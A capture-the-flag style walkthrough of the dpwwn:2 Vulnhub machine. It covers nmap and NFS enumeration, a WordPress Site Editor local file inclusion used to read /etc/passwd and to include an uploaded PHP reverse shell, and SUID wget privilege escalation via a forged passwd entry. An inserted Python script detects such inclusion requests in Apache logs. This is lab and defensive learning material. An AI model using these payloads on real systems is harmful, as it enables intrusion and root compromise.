      dpwwn:2 Vulnhub Walkthrough

       新進小設計 2021-12-04

      This image is configured with the static IP address 10.10.10.10, so the network needs to be adjusted.

      Host-level scan:

      ╰─ nmap -p1-65535 -sV -A 10.10.10.10 

       

      80/tcp    open  http      Apache httpd 2.4.38 ((Ubuntu))

      443/tcp   open  ssl/https Apache/2.4.38 (Ubuntu)

      2049/tcp open nfs_acl 3 (RPC #100227)
      34153/tcp open nlockmgr 1-4 (RPC #100021)
      46643/tcp open mountd 1-3 (RPC #100005)
      49509/tcp open mountd 1-3 (RPC #100005)
      50875/tcp open mountd 1-3 (RPC #100005)

       

      ╰─ showmount -e 10.10.10.10
      Export list for 10.10.10.10:
      /home/dpwwn02 (everyone)

      ╰─ ls -laRt
      .:
      總用量 8
      drwxr-xr-x 25 root root 4096 8月 14 17:59 ..
      drwxr-xr-x 2 nobody nogroup 4096 8月 8 15:46 .

       

      ╰─ dirb http://10.10.10.10/

      ---- Scanning URL: http://10.10.10.10/ ----
      + http://10.10.10.10/index.html (CODE:403|SIZE:219)
      + http://10.10.10.10/index.php (CODE:200|SIZE:167)
      + http://10.10.10.10/server-status (CODE:403|SIZE:222)
      ==> DIRECTORY: http://10.10.10.10/wordpress/

      ╰─ wpscan --url http://10.10.10.10/wordpress/

      ** Proof of Concept **
      http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

      http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

       

      Combining this with the NFS file permissions found earlier, try including a file:

      http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/php-reverse.php
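How the include requests above appear from the server side, as an added detection example that is not part of the original post: it scans Apache access-log lines for requests to the plugin endpoint whose ajax_path value is a filesystem path, including percent-encoded variants. The log lines and client addresses are constructed, and treating every absolute path, traversal sequence or URL in ajax_path as suspicious is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
# Endpoint and parameter from the wpscan proof of concept quoted on this page.
ENDPOINT = "ajax_shortcode_pattern.php"
PARAM = "ajax_path"
PLUGIN = "/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/"
# Client address, request target and status from an Apache combined-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252F) so encoded paths are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_includes(log_lines):
    """Return (client, status, path) for requests passing a file path to ajax_path."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + ENDPOINT):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            path = fully_decode(raw)
            # Assumption: absolute paths, traversal and URLs are never legitimate here.
            if path.startswith("/") or ".." in path or "://" in path:
                hits.append((client, int(status), path))
    return hits

# Constructed sample log lines (documentation-range client addresses).
def sample_line(client, target):
    return f'{client} - - [04/Dec/2021:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512 "-" "-"'
SAMPLE_LOG = [
    sample_line("192.0.2.15", PLUGIN + ENDPOINT + "?ajax_path=/etc/passwd"),
    sample_line("192.0.2.15", PLUGIN + ENDPOINT + "?ajax_path=%252Fetc%252Fpasswd"),
    sample_line("198.51.100.7", "/wordpress/index.php"),
    sample_line("192.0.2.15", PLUGIN + ENDPOINT + "?ajax_path=/home/dpwwn02/php-reverse.php"),
]

if __name__ == "__main__":
    for hit in suspicious_includes(SAMPLE_LOG):
        print(hit)
```

A 200 status on a hit means the server answered the include request, so those entries deserve review first.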

       

      Privilege escalation:

      find / -perm -u=s -type f 2>/dev/null

      which wget

      ls -lha /usr/bin/wget

      find /home -exec chmod u+s /usr/bin/wget \;

      ls -lh /usr/bin/wget
      -rwsr-xr-x 1 root root 460K Apr 9 13:35 /usr/bin/wget

      Download the passwd file to the local machine:

      http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

      ╰─ openssl passwd -1 -salt hack pass123
      $1$hack$22.CgYt2uMolqeatCk9ih/

      Append it to the end of the passwd file.

      Done!

       
